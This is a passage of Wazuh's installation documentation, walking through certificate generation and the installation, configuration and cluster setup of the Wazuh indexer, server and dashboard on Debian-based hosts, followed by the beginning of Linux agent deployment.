  1. Download the wazuh-certs-tool.sh script and the config.yml configuration file. This creates the certificates that encrypt communications between the Wazuh central components.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-certs-tool.sh
    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  2. Edit ./config.yml and replace the node names and IP values with the corresponding names and IP addresses. You need to do this for all Wazuh server, Wazuh indexer, and Wazuh dashboard nodes. Add as many node fields as needed.

    nodes:
      # Wazuh indexer nodes
      indexer:
        - name: node-1
          ip: "<indexer-node-ip>"
        #- name: node-2
        #  ip: "<indexer-node-ip>"
        #- name: node-3
        #  ip: "<indexer-node-ip>"
    
      # Wazuh server nodes
      # If there is more than one Wazuh server
      # node, each one must have a node_type
      server:
        - name: wazuh-1
          ip: "<wazuh-manager-ip>"
        #  node_type: master
        #- name: wazuh-2
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
        #- name: wazuh-3
        #  ip: "<wazuh-manager-ip>"
        #  node_type: worker
    
      # Wazuh dashboard nodes
      dashboard:
        - name: dashboard
          ip: "<dashboard-node-ip>"
    

    To learn more about how to create and configure the certificates, see the Certificates deployment section.

  3. Run ./wazuh-certs-tool.sh to create the certificates. For a multi-node cluster, these certificates need to be later deployed to all Wazuh instances in your cluster.

    # bash ./wazuh-certs-tool.sh -A
    
  4. Compress all the necessary files.

    # tar -cvf ./wazuh-certificates.tar -C ./wazuh-certificates/ .
    # rm -rf ./wazuh-certificates
    
  5. Copy the wazuh-certificates.tar file to all the nodes, including the Wazuh indexer, Wazuh server, and Wazuh dashboard nodes. This can be done by using the scp utility.

Wazuh indexer nodes installation

Follow these steps to install and configure a single-node or multi-node Wazuh indexer.

Installing package dependencies
  1. Run the following command to install the following packages if missing:

    # apt-get install debconf adduser procps
    
Adding the Wazuh repository
  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh indexer
  1. Install the Wazuh indexer package.

    # apt-get -y install wazuh-indexer
    
Configuring the Wazuh indexer
  1. Edit /etc/wazuh-indexer/opensearch.yml and replace the following values:

    1. network.host: Sets the address of this node for both HTTP and transport traffic. The node will bind to this address and use it as its publish address. Accepts an IP address or a hostname.

      Use the same node address set in config.yml to create the SSL certificates.

    2. node.name: Name of the Wazuh indexer node as defined in the config.yml file. For example, node-1.

    3. cluster.initial_master_nodes: List of the names of the master-eligible nodes. These names are defined in the config.yml file. Uncomment the node-2 and node-3 lines, change the names, or add more lines, according to your config.yml definitions.

      cluster.initial_master_nodes:
      - "node-1"
      - "node-2"
      - "node-3"
      
    4. discovery.seed_hosts: List of the addresses of the master-eligible nodes. Each element can be either an IP address or a hostname. You may leave this setting commented if you are configuring the Wazuh indexer as a single node. For multi-node configurations, uncomment this setting and set the IP addresses of each master-eligible node.

      discovery.seed_hosts:
        - "10.0.0.1"
        - "10.0.0.2"
        - "10.0.0.3"
      
    5. plugins.security.nodes_dn: List of the Distinguished Names of the certificates of all the Wazuh indexer cluster nodes. Uncomment the lines for node-2 and node-3 and change the common names (CN) and values according to your settings and your config.yml definitions.

      plugins.security.nodes_dn:
      - "CN=node-1,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-2,OU=Wazuh,O=Wazuh,L=California,C=US"
      - "CN=node-3,OU=Wazuh,O=Wazuh,L=California,C=US"
      

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.

Deploying certificates

Note

Make sure that a copy of wazuh-certificates.tar, created in the previous stage of the installation process, is placed in your working directory.

  1. Run the following commands, replacing <INDEXER_NODE_NAME> with the name of the Wazuh indexer node you are configuring as defined in config.yml. For example, node-1. This deploys the SSL certificates to encrypt communications between the Wazuh central components.

    # NODE_NAME=<INDEXER_NODE_NAME>
    
    # mkdir /etc/wazuh-indexer/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/wazuh-indexer/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./admin.pem ./admin-key.pem ./root-ca.pem
    # mv -n /etc/wazuh-indexer/certs/$NODE_NAME.pem /etc/wazuh-indexer/certs/indexer.pem
    # mv -n /etc/wazuh-indexer/certs/$NODE_NAME-key.pem /etc/wazuh-indexer/certs/indexer-key.pem
    # chmod 500 /etc/wazuh-indexer/certs
    # chmod 400 /etc/wazuh-indexer/certs/*
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/certs
    
  2. Recommended action: If no other Wazuh components will be installed on this node, run the following command to remove the wazuh-certificates.tar file.

    # rm -f ./wazuh-certificates.tar
    

Note

For Wazuh indexer installation on hardened endpoints with noexec flag on the /tmp directory, additional setup is required. See the Wazuh indexer configuration on hardened endpoints section for necessary configuration.

Starting the service
  1. Enable and start the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    

Repeat this stage of the installation process for every Wazuh indexer node in your multi-node cluster. Then proceed with initializing your single-node or multi-node cluster in the next stage.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Cluster initialization

The final stage of installing the Wazuh indexer single-node or multi-node cluster consists of running the security admin script.

  1. Run the Wazuh indexer indexer-security-init.sh script on any Wazuh indexer node to load the new certificates information and start the single-node or multi-node cluster.

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    

    Note

    You only have to initialize the cluster once, there is no need to run this command on every node.

Testing the cluster installation
  1. Run the following commands to confirm that the installation is successful. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter admin as the password when prompted:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
    {
      "name" : "node-1",
      "cluster_name" : "wazuh-cluster",
      "cluster_uuid" : "095jEW-oRJSFKLz5wmo5PA",
      "version" : {
        "number" : "7.10.2",
        "build_type" : "rpm",
        "build_hash" : "db90a415ff2fd428b4f7b3f800a51dc229287cb4",
        "build_date" : "2023-06-03T06:24:25.112415503Z",
        "build_snapshot" : false,
        "lucene_version" : "9.6.0",
        "minimum_wire_compatibility_version" : "7.10.0",
        "minimum_index_compatibility_version" : "7.0.0"
      },
      "tagline" : "The OpenSearch Project: https://opensearch.org/"
    }
    
  2. Run the following command to check if the cluster is working correctly. Replace <WAZUH_INDEXER_IP_ADDRESS> with the IP address of the Wazuh indexer and enter admin as the password when prompted:

    # curl -k -u admin https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    

    The command produces output similar to the following:

    ip              heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                               cluster_manager name
    192.168.107.240           19          94   4    0.22    0.21     0.20 dimr      data,ingest,master,remote_cluster_client *               node-1
    
Next steps

The Wazuh indexer is now successfully installed on your single-node or multi-node cluster, and you can proceed with installing the Wazuh server. To perform this action, see the Installing the Wazuh server step by step section.

To uninstall the Wazuh indexer, see Uninstalling the Wazuh indexer.

Wazuh server

The Wazuh server analyzes the data received from the Wazuh agents, triggering alerts when threats or anomalies are detected. It is also used to remotely manage the configurations of Wazuh agents and monitor their status. If you want to learn more about the Wazuh components, check the Getting started section.

You can install the Wazuh server on a single host or distribute it across multiple nodes in a cluster configuration. Multi-node configurations provide high availability and improved performance. When combined with a network load balancer, you can achieve efficient use of its capacity.

Check the requirements below and choose an installation method to start installing the Wazuh server.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh server installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware requirements

You can install the Wazuh server as a single-node or multi-node cluster.

  • Hardware recommendations

    Minimum

    Recommended

    Component

    RAM (GB)

    CPU (cores)

    RAM (GB)

    CPU (cores)

    Wazuh server

    2

    2

    4

    8

  • Disk space requirements

    The amount of data depends on the generated alerts per second (APS). This table details the estimated disk space needed per agent to store 90 days of alerts on a Wazuh server, depending on the type of monitored endpoints.

    Monitored endpoints

    APS

    Storage in Wazuh Server
    (GB/90 days)

    Servers

    0.25

    0.1

    Workstations

    0.1

    0.04

    Network devices

    0.5

    0.2

    For example, for an environment with 80 workstations, 10 servers, and 10 network devices, the storage needed on the Wazuh server for 90 days of alerts is 6 GB.

Scaling

To determine if a Wazuh server requires more resources, monitor these files:

  • /var/ossec/var/run/wazuh-analysisd.state: the variable events_dropped indicates whether events are being dropped due to lack of resources.

  • /var/ossec/var/run/wazuh-remoted.state: the variable discarded_count indicates if messages from the agents were discarded.

These two variables should be zero if the environment is working properly. If it is not the case, you can add additional nodes to the cluster.

Installing the Wazuh server using the assisted installation method

Install the Wazuh server as a single-node or multi-node cluster on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. The Wazuh server analyzes the data received from the Wazuh agents, triggering alerts when it detects threats and anomalies. This central component includes the Wazuh manager and Filebeat.

Wazuh server cluster installation
  1. Download the Wazuh installation assistant. Skip this step if you installed Wazuh indexer on the same server and the Wazuh installation assistant is already in your working directory:

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-server followed by the node name to install the Wazuh server. The node name must be the same one used in config.yml for the initial configuration, for example, wazuh-1:

    Note

    Make sure that a copy of wazuh-install-files.tar, created during the initial configuration step, is placed in your working directory.

    # bash wazuh-install.sh --wazuh-server wazuh-1
    

Your Wazuh server is now successfully installed.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

The Wazuh server installation is now complete, and you can proceed with installing the Wazuh dashboard. To perform this action, see the Installing the Wazuh dashboard using the assisted installation method section.

Installing the Wazuh server step by step

Install and configure the Wazuh server as a single-node or multi-node cluster following step-by-step instructions. The Wazuh server is a central component that includes the Wazuh manager and Filebeat. The Wazuh manager collects and analyzes data from the deployed Wazuh agents. It triggers alerts when threats or anomalies are detected. Filebeat securely forwards alerts and archived events to the Wazuh indexer.

The installation process is divided into two stages.

  1. Wazuh server node installation

  2. Cluster configuration for multi-node deployment

Note

You need root user privileges to run all the commands described below.

Wazuh server node installation

Follow these steps to install a single-node or multi-node cluster Wazuh server.

Adding the Wazuh repository

Note

If you are installing the Wazuh server on the same host as the Wazuh indexer, you may skip these steps only if the Wazuh repository is already configured and enabled.

  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh manager
  1. Install the Wazuh manager package.

    # apt-get -y install wazuh-manager
    

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.

Installing Filebeat
  1. Install the Filebeat package.

    # apt-get -y install filebeat
    
Configuring Filebeat
  1. Download the preconfigured Filebeat configuration file.

    # curl -so /etc/filebeat/filebeat.yml https://packages.wazuh.com/5.0/tpl/wazuh/filebeat/filebeat.yml
    
  2. Edit the /etc/filebeat/filebeat.yml configuration file and replace the following value:

    1. hosts: The list of Wazuh indexer nodes to connect to. You can use either IP addresses or hostnames. By default, the host is set to localhost hosts: ["127.0.0.1:9200"]. Replace your Wazuh indexer IP address accordingly.

      If you have more than one Wazuh indexer node, you can separate the addresses using commas. For example, hosts: ["10.0.0.1:9200", "10.0.0.2:9200", "10.0.0.3:9200"]

      # Wazuh - Filebeat configuration file
      output.elasticsearch:
      hosts: ["10.0.0.1:9200"]
      protocol: https
      username: ${username}
      password: ${password}
      
  3. Create a Filebeat keystore to securely store authentication credentials.

    # filebeat keystore create
    
  4. Add the default username and password admin:admin to the secrets keystore.

    # echo admin | filebeat keystore add username --stdin --force
    # echo admin | filebeat keystore add password --stdin --force
    
  5. Download the alerts template for the Wazuh indexer.

    # curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/v5.0.0/extensions/elasticsearch/7.x/wazuh-template.json
    # chmod go+r /etc/filebeat/wazuh-template.json
    
  6. Install the Wazuh module for Filebeat.

    # curl -s https://packages.wazuh.com/5.x/filebeat/wazuh-filebeat-0.5.tar.gz | tar -xvz -C /usr/share/filebeat/module
    
Deploying certificates

Note

Make sure that a copy of the wazuh-certificates.tar file, created during the initial configuration step, is placed in your working directory.

  1. Replace <SERVER_NODE_NAME> with your Wazuh server node certificate name, the same one used in config.yml when creating the certificates. Then, move the certificates to their corresponding location.

    # NODE_NAME=<SERVER_NODE_NAME>
    
    # mkdir /etc/filebeat/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/filebeat/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./root-ca.pem
    # mv -n /etc/filebeat/certs/$NODE_NAME.pem /etc/filebeat/certs/filebeat.pem
    # mv -n /etc/filebeat/certs/$NODE_NAME-key.pem /etc/filebeat/certs/filebeat-key.pem
    # chmod 500 /etc/filebeat/certs
    # chmod 400 /etc/filebeat/certs/*
    # chown -R root:root /etc/filebeat/certs
    
Configuring the Wazuh indexer connection

Note

You can skip this step if you are not going to use the vulnerability detection capability.

  1. Save the Wazuh indexer username and password into the Wazuh manager keystore using the wazuh-keystore tool. Replace <WAZUH_INDEXER_USERNAME> and <WAZUH_INDEXER_PASSWORD> with the Wazuh indexer username and password:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    Note

    The default step-by-step installation credentials are admin:admin

  2. Edit /var/ossec/etc/ossec.conf to configure the indexer connection.

    By default, the indexer settings have one host configured. It's set to 0.0.0.0 as highlighted below.

    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
    • Replace 0.0.0.0 with your Wazuh indexer node IP address or hostname. You can find this value in the Filebeat config file /etc/filebeat/filebeat.yml.

    • Ensure the Filebeat certificate and key name match the certificate files in /etc/filebeat/certs.

    If you are running a Wazuh indexer cluster infrastructure, add a <host> entry for each one of your nodes. For example, in a two-node configuration:

    <hosts>
      <host>https://10.0.0.1:9200</host>
      <host>https://10.0.0.2:9200</host>
    </hosts>
    

    The Wazuh server prioritizes reporting to the first Wazuh indexer node in the list. It switches to the next node in case it is not available.

Starting the Wazuh manager
  1. Enable and start the Wazuh manager service.

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
  2. Run the following command to verify the Wazuh manager status.

    # systemctl status wazuh-manager
    
Starting the Filebeat service
  1. Enable and start the Filebeat service.

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  2. Run the following command to verify that Filebeat is successfully installed.

    # filebeat test output
    

    Expand the output to see an example response.

    elasticsearch: https://127.0.0.1:9200...
      parse url... OK
      connection...
        parse host... OK
        dns lookup... OK
        addresses: 127.0.0.1
        dial up... OK
      TLS...
        security: server's certificate chain verification is enabled
        handshake... OK
        TLS version: TLSv1.3
        dial up... OK
      talk to server... OK
      version: 7.10.2
    

Your Wazuh server node is now successfully installed. Repeat this stage of the installation process for every Wazuh server node in your Wazuh cluster, then proceed with configuring the Wazuh cluster. If you want a Wazuh server single-node cluster, everything is set and you can proceed directly with Installing the Wazuh dashboard step by step.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Cluster configuration for multi-node deployment

After completing the installation of the Wazuh server on every node, you need to configure one server node only as the master and the rest as workers.

Configuring the Wazuh server master node
  1. Edit the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
      <name>wazuh</name>
      <node_name>master-node</node_name>
      <node_type>master</node_type>
      <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
      <port>1516</port>
      <bind_addr>0.0.0.0</bind_addr>
      <nodes>
        <node><WAZUH_MASTER_ADDRESS></node>
      </nodes>
      <hidden>no</hidden>
      <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node.

    node_type

    It specifies the role of the node. It has to be set to master.

    key

    Key that is used to encrypt communication between cluster nodes. The key must be 32 characters long and the same for all of the nodes in the cluster. The following command can be used to generate a random key: openssl rand -hex 16.

    port

    It indicates the destination port for cluster communication.

    bind_addr

    It is the network IP to which the node is bound to listen for incoming requests (0.0.0.0 for any IP).

    nodes

    It is the address of the master node and can be either an IP or a DNS. This parameter must be specified in all nodes, including the master itself.

    hidden

    It shows or hides the cluster information in the generated alerts.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. This option must be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    
Configuring the Wazuh server worker nodes
  1. Configure the cluster node by editing the following settings in the /var/ossec/etc/ossec.conf file and configure the necessary parameters:

    <cluster>
        <name>wazuh</name>
        <node_name>worker-node</node_name>
        <node_type>worker</node_type>
        <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
        <port>1516</port>
        <bind_addr>0.0.0.0</bind_addr>
        <nodes>
            <node><WAZUH_MASTER_ADDRESS></node>
        </nodes>
        <hidden>no</hidden>
        <disabled>no</disabled>
    </cluster>
    

    Parameters to be configured:

    name

    It indicates the name of the cluster.

    node_name

    It indicates the name of the current node. Each node of the cluster must have a unique name.

    node_type

    It specifies the role of the node. It has to be set as worker.

    key

    The key created previously for the master node. It has to be the same for all the nodes.

    nodes

    It has to contain the address of the master node and can be either an IP or a DNS.

    disabled

    It indicates whether the node is enabled or disabled in the cluster. It has to be set to no.

  2. Restart the Wazuh manager.

    # systemctl restart wazuh-manager
    

Repeat these configuration steps for every Wazuh server worker node in your cluster.

Testing Wazuh server cluster

Run the following command to verify that the Wazuh cluster is enabled and all the nodes are connected:

# /var/ossec/bin/cluster_control -l

An example output of the command looks as follows:

NAME         TYPE    VERSION  ADDRESS
master-node  master  4.12.0   10.0.0.3
worker-node1 worker  4.12.0   10.0.0.4
worker-node2 worker  4.12.0   10.0.0.5

Note that 10.0.0.3, 10.0.0.4, 10.0.0.5 are example IPs.

Next steps

The Wazuh server installation is now complete, and you can proceed with Installing the Wazuh dashboard step by step.

If you want to uninstall the Wazuh server, see Uninstalling the Wazuh server.

Wazuh dashboard

This Wazuh central component is a flexible and intuitive web interface for mining, analyzing, and visualizing security data. It provides out-of-the-box dashboards, allowing you to seamlessly navigate through the user interface.

With the Wazuh dashboard, you can visualize security events, detected vulnerabilities, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and regulatory compliance standards. If you want to learn more about the Wazuh components, see the Getting started section.

Check the requirements below and choose an installation method to start installing the Wazuh dashboard.

Requirements

Check the supported operating systems and the recommended hardware requirements for the Wazuh dashboard installation. Make sure that your system environment meets all requirements and that you have root user privileges.

Hardware requirements

The Wazuh dashboard can be installed on a dedicated node or along with the Wazuh indexer.

  • Hardware recommendations

    Minimum

    Recommended

    Component

    RAM (GB)

    CPU (cores)

    RAM (GB)

    CPU (cores)

    Wazuh dashboard

    4

    2

    8

    4

Installing the Wazuh dashboard using the assisted installation method

Install and configure the Wazuh dashboard on a 64-bit (x86_64/AMD64 or AARCH64/ARM64) architecture using the assisted installation method. Wazuh dashboard is a flexible and intuitive web interface for mining and visualizing security events and archives.

Wazuh dashboard installation
  1. Download the Wazuh installation assistant. You can skip this step if you have already installed Wazuh indexer on the same server.

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
  2. Run the Wazuh installation assistant with the option --wazuh-dashboard and the node name to install and configure the Wazuh dashboard. The node name must be the same one used in config.yml for the initial configuration, for example, dashboard:

    Note

    Make sure that a copy of wazuh-install-files.tar created during the Wazuh indexer installation is placed in your working directory.

    # bash wazuh-install.sh --wazuh-dashboard dashboard
    

    The default Wazuh web user interface port is 443, used by the Wazuh dashboard. You can change this port using the optional parameter -p <PORT_NUMBER> or --port <PORT_NUMBER>. Some recommended ports are 8443, 8444, 8080, 8888, and 9000.

    Once the Wazuh installation is completed, the output shows the access credentials and a message that confirms that the installation was successful.

    INFO: --- Summary ---
    INFO: You can access the web interface https://<WAZUH_DASHBOARD_IP_ADDRESS>
       User: admin
       Password: <ADMIN_PASSWORD>
    
    INFO: Installation finished.
    

    You now have installed and configured Wazuh. Find all passwords that the Wazuh installation assistant generated in the wazuh-passwords.txt file inside the wazuh-install-files.tar archive. Run the following command to print them:

    # tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt
    
  3. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: <ADMIN_PASSWORD>

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser instead. Alternatively, you can configure a certificate from a trusted authority.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Next steps

All the Wazuh central components are successfully installed.

The Wazuh environment is now ready, and you can proceed with installing the Wazuh agent on the endpoints to be monitored. To perform this action, see the Wazuh agent section.

Installing the Wazuh dashboard step by step

Install and configure the Wazuh dashboard following step-by-step instructions. The Wazuh dashboard is a web interface for mining and visualizing the Wazuh server alerts and archived events.

Note

You need root user privileges to run all the commands described below.

Wazuh dashboard installation

Follow these steps to install the Wazuh dashboard.

Installing package dependencies
  1. Install the following packages if missing.

    # apt-get install debhelper tar curl libcap2-bin #debhelper version 9 or later
    
Adding the Wazuh repository

Note

If you are installing the Wazuh dashboard on the same host as the Wazuh indexer or the Wazuh server, you may skip these steps as you may have added the Wazuh repository already.

  1. Install the following packages if missing.

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  3. Add the repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  4. Update the packages information.

    # apt-get update
    
Installing the Wazuh dashboard
  1. Install the Wazuh dashboard package.

    # apt-get -y install wazuh-dashboard
    
Configuring the Wazuh dashboard
  1. Edit the /etc/wazuh-dashboard/opensearch_dashboards.yml file and replace the following values:

    1. server.host: This setting specifies the host of the Wazuh dashboard server. To allow remote users to connect, set the value to the IP address or DNS name of the Wazuh dashboard server. The value 0.0.0.0 will accept all the available IP addresses of the host.

    2. opensearch.hosts: The URLs of the Wazuh indexer instances to use for all your queries. The Wazuh dashboard can be configured to connect to multiple Wazuh indexer nodes in the same cluster. The addresses of the nodes can be separated by commas. For example, ["https://10.0.0.2:9200", "https://10.0.0.3:9200","https://10.0.0.4:9200"]

         server.host: 0.0.0.0
         server.port: 443
         opensearch.hosts: https://localhost:9200
         opensearch.ssl.verificationMode: certificate
      

Note

Firewalls can block communication between Wazuh components on different hosts. Refer to the Required ports section and ensure the necessary ports are open.

Deploying certificates

Note

Make sure that a copy of the wazuh-certificates.tar file, created during the initial configuration step, is placed in your working directory.

  1. Replace <DASHBOARD_NODE_NAME> with your Wazuh dashboard node name, the same one used in config.yml to create the certificates, and move the certificates to their corresponding location.

    # NODE_NAME=<DASHBOARD_NODE_NAME>
    
    # mkdir /etc/wazuh-dashboard/certs
    # tar -xf ./wazuh-certificates.tar -C /etc/wazuh-dashboard/certs/ ./$NODE_NAME.pem ./$NODE_NAME-key.pem ./root-ca.pem
    # mv -n /etc/wazuh-dashboard/certs/$NODE_NAME.pem /etc/wazuh-dashboard/certs/dashboard.pem
    # mv -n /etc/wazuh-dashboard/certs/$NODE_NAME-key.pem /etc/wazuh-dashboard/certs/dashboard-key.pem
    # chmod 500 /etc/wazuh-dashboard/certs
    # chmod 400 /etc/wazuh-dashboard/certs/*
    # chown -R wazuh-dashboard:wazuh-dashboard /etc/wazuh-dashboard/certs
    
Starting the Wazuh dashboard service
  1. Enable and start the Wazuh dashboard service.

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    
  2. Edit the /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml file and replace <WAZUH_SERVER_IP_ADDRESS> with the IP address or hostname of the Wazuh server master node.

    hosts:
       - default:
          url: https://<WAZUH_SERVER_IP_ADDRESS>
          port: 55000
          username: wazuh-wui
          password: wazuh-wui
          run_as: false
    
  3. Access the Wazuh web interface with your admin user credentials. This is the default administrator account for the Wazuh indexer and it allows you to access the Wazuh dashboard.

    • URL: https://<WAZUH_DASHBOARD_IP_ADDRESS>

    • Username: admin

    • Password: admin

    When you access the Wazuh dashboard for the first time, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser. For increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, you can configure a certificate from a trusted authority.

Disable Wazuh updates

We recommend disabling the Wazuh package repositories after installing all components on this server to prevent accidental upgrades.

Execute the following command only after completing all installations:

# sed -i "s/^deb /#deb /" /etc/apt/sources.list.d/wazuh.list
# apt update
Securing your Wazuh installation

You have now installed and configured all the Wazuh central components. We recommend changing the default credentials to protect your infrastructure from possible attacks.

Select your deployment type and follow the instructions to change the default passwords for both the Wazuh API and the Wazuh indexer users.

  1. Use the Wazuh passwords tool to change all the internal users' passwords.

    # /usr/share/wazuh-indexer/plugins/opensearch-security/tools/wazuh-passwords-tool.sh --api --change-all --admin-user wazuh --admin-password wazuh
    
    INFO: The password for user admin is yWOzmNA.?Aoc+rQfDBcF71KZp?1xd7IO
    INFO: The password for user kibanaserver is nUa+66zY.eDF*2rRl5GKdgLxvgYQA+wo
    INFO: The password for user kibanaro is 0jHq.4i*VAgclnqFiXvZ5gtQq1D5LCcL
    INFO: The password for user logstash is hWW6U45rPoCT?oR.r.Baw2qaWz2iH8Ml
    INFO: The password for user readall is PNt5K+FpKDMO2TlxJ6Opb2D0mYl*I7FQ
    INFO: The password for user snapshotrestore is +GGz2noZZr2qVUK7xbtqjUup049tvLq.
    WARNING: Wazuh indexer passwords changed. Remember to update the password in the Wazuh dashboard and Filebeat nodes if necessary, and restart the services.
    INFO: The password for Wazuh API user wazuh is JYWz5Zdb3Yq+uOzOPyUU4oat0n60VmWI
    INFO: The password for Wazuh API user wazuh-wui is +fLddaCiZePxh24*?jC0nyNmgMGCKE+2
    INFO: Updated wazuh-wui user password in wazuh dashboard. Remember to restart the service.
    
Next steps

All the Wazuh central components are successfully installed and secured.

The Wazuh environment is now ready, and you can proceed with installing the Wazuh agent on the endpoints to be monitored. To perform this action, see the Wazuh agent section.

If you want to uninstall the Wazuh dashboard, see Uninstalling the Wazuh dashboard.

Wazuh agent

The Wazuh agent is multi-platform and runs on the endpoints that you want to monitor. It communicates with the Wazuh server, sending data in near real-time through an encrypted and authenticated channel.

The Wazuh agent was developed considering the need to monitor a wide variety of different endpoints without impacting their performance. It is supported on the most popular operating systems, and it requires 35 MB of RAM on average.

The Wazuh agent provides key features to enhance your system’s security.

Log collector

Command execution

File integrity monitoring (FIM)

Security configuration assessment (SCA)

System inventory

Malware detection

Active Response

Container security

Cloud security

To install a Wazuh agent, select your operating system and follow the instructions.

If you are deploying Wazuh in a large environment, with a high number of servers or endpoints, keep in mind that this deployment might be easier using automation tools such as Puppet, Chef, SCCM, or Ansible.

Note

Compatibility between the Wazuh agent and the Wazuh manager is guaranteed when the Wazuh manager version is later than or equal to that of the Wazuh agent.

You can also deploy a new agent following the instructions in the Wazuh dashboard. Go to Agents management > Summary, and click on Deploy new agent.

Deploy new agent button

Then follow the steps on the Wazuh dashboard to deploy a new agent.

Deploy a new agent instructions
Deploying Wazuh agents on Linux endpoints

The Wazuh agent runs on the endpoint you want to monitor and communicates with the Wazuh manager, sending data in near real-time through an encrypted and authenticated channel.

The deployment of a Wazuh agent on a Linux endpoint uses deployment variables that facilitate the task of installing, enrolling, and configuring the Wazuh agent. Alternatively, if you want to download the Wazuh agent package directly, see the packages list section.

Note

You need root user privileges to run all the commands described below.

Add the Wazuh repository

Add the Wazuh repository to download the official packages.

  1. Install the following packages if missing:

    # apt-get install gnupg apt-transport-https
    
  2. Install the GPG key:

